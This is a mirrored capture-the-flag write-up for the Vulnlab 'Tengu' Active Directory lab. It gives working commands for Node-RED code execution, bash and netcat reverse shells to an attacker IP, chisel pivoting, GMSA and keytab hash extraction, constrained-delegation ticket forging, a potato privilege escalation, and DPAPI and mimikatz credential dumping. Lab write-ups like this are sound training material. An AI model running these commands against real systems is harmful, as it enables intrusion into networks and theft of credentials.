Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-25 05:10:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/Vulnlab/Tengu.md
ARZ 339c426d5e
Update Tengu.md
2024-09-19 12:58:44 +03:00

8.8 KiB
Raw Blame History

Vulnlab - Tengu

DC.tengu.vl

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tengu.vl
| Issuer: commonName=DC.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:33
| Not valid after:  2025-03-16T15:26:33
| MD5:   b350:11ed:41ce:ff32:a34f:0088:ce22:96f5
|_SHA-1: 711b:6409:e399:0771:d3d3:7eba:1938:5914:7c84:7528
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SQL.tengu.vl

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-15T15:30:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SQL.tengu.vl
| Issuer: commonName=SQL.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:45
| Not valid after:  2025-03-16T15:26:45
| MD5:   3cd6:9298:18df:b91e:5194:c958:0df4:528b
|_SHA-1: b304:c807:0de4:a171:0c1a:8b16:1f3e:bd29:2e21:99b5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

nodered.tengu.vl

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 41:c7:d4:28:ec:d8:5b:aa:97:ee:c0:be:3c:e3:aa:73 (ED25519)
1880/tcp open  vsat-control?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Both windows hosts had only RDP service enabled, on linux hosts, there was something hosted on port 1880 which on googling shows it runs Node-RED, which is a flow based development tool for visual programming used in IoT devices

Remote Command Execution Through Node-RED

Node-RED is known for getting remote command execution (RCE), to achieve this, we'll need to create a flow by timestamp block following exec block

Replacing the curl command with bash reverse shell

bash -i >& /dev/tcp/10.8.0.136/2222 0>&1

After having the shell, it can be stabilized with python3 to use it as a normal shell

From nodered directory, we can find some type of hashed password but not really sure who this belongs to and how this can be cracked

Accessing MSSQL

From sql node properties, we can see the connection string with the username nodered_connector

So there's a script to decrypt the node-red credentials, which needs flows_cred.json and .config.runtime.json https://gist.github.com/Yeeb1/fe9adcd39306e3ced6bdfc7758a43519

In order to connect to MSSQL, we'll need to performing pivoting since that service isn't exposed we'll use chisel socks proxy

chisel server --reverse -p 3000
chisel client 10.8.0.136:3000 R:socks

With this, we'll be able to reach port 1433 on sql.tengu.vl

Trying to enable xp_cmdshell resulted in no luck as this user didn't had privileged in mssql

Enumerating the databases, there are two, which are not available by default, Dev and Demo

Dev didn't had anything interesting while there was one set of credential from Demo

Attempting to crack this with rockyou.txt didn't work as the password wasn't present there however crackstation came in handy here

Having the credentials, we can verify if this is a valid domain user

With bloodhound-python, the domain can be enumerated

proxychains bloodhound-python -d tengu.vl -u t2_m.winters -p 'Tengu123' -c all -ns 10.10.183.37

Escalating privileges on linux host

From bloodhound, t2_m.winters is a member of linux admin group which means we can have local admin on the linux host

Through ssh we can easily switch to t2_m.winters user

this host has ReadGMSAPassword on GMSA01$ account

Constrained Delegation on SQL Host

The NThash can be retrieved from /etc/krb5.keytab, this file contains service account hash in this case has NODERED's NThash, the hash can be extracted with KeyTabExtract https://github.com/sosdave/KeyTabExtract/tree/master

This hash can be verified by authenticating on DC

GMSA hash can be retrieved by using --gmsa module on LDAP

proxychains nxc ldap 10.10.238.213  -u 'NODERED$' -H 'hash' --gmsa

This account has AllowedToDelegate permission on SQL host which means we can impersonate as a local admin on this host through MSSQL service, performing constrained delegation

With getST.py we can try to impersonate as administrator user for MSSQL service sql host but it didn't worked for administrator

Instead of admin, we can check what other users we could target, there's a group name SQL Admins , with two users

Here we can try to impersonate T1.M_Winters and then login through MSSQL using the ticket

proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T1_M.WINTERS' -hashes :hash 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.168.213

From here xp_cmdshell can be enabled and system commands can be executed in the context of gmsa01$

With netcat, we can get a reverse shell

Checking our privileges, we can get local administrator by abusing SeImpersonatePrivilege with JuicyPotato-NG or any other recent potato exploit

JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:/Windows/Temp/nc.exe 10.8.0.136 3333 -e cmd.exe"

Lateral Movement - Extracting Credentials Trough DPAPI

Running mimikatz to dump local admin hash and checking if there are any hashes in lsass

With lsadump::cache , domain cached credentials can be found where there's cached credentials for c.fowler but obviously this is not in NThash format so it cannot be used in pth unless it's gets cracked, which in this case was not the way

To dump saved credentials from credential Manager/ task scheduler, we can target DPAPI which stores credentials with user specific keys, being a local admin we can utilize sharpdpapi to dump all credentials

SharpDPAPI.exe machinecredentials

Using kerberos authentication to spawn a shell as T0_c.fowler

T0_c.fowler is a domain admin, authenticating against the DC to see if the password is valid

But the plain text password wasn't working and it's probably due to admin users belonging to Protected Users Group which is why we'll need to use kerberos authentication

So instead, using kinit we can request TGT for the user by specifying the plain text password and we'll get our ticket using by modifying the /etc/krb5.conf configuration file

[libdefaults]
        default_realm = TENGU.VL
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false
        dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]
        TENGU.VL = {
                kdc = dc.tengu.vl
        }

[domain_realm]
        .tengu.vl = TENGU.VL

Having the ticket, we can just dump hashes from ntds.dit using secretsdump.py or just spawn a shell using smb, wmi or psexec

References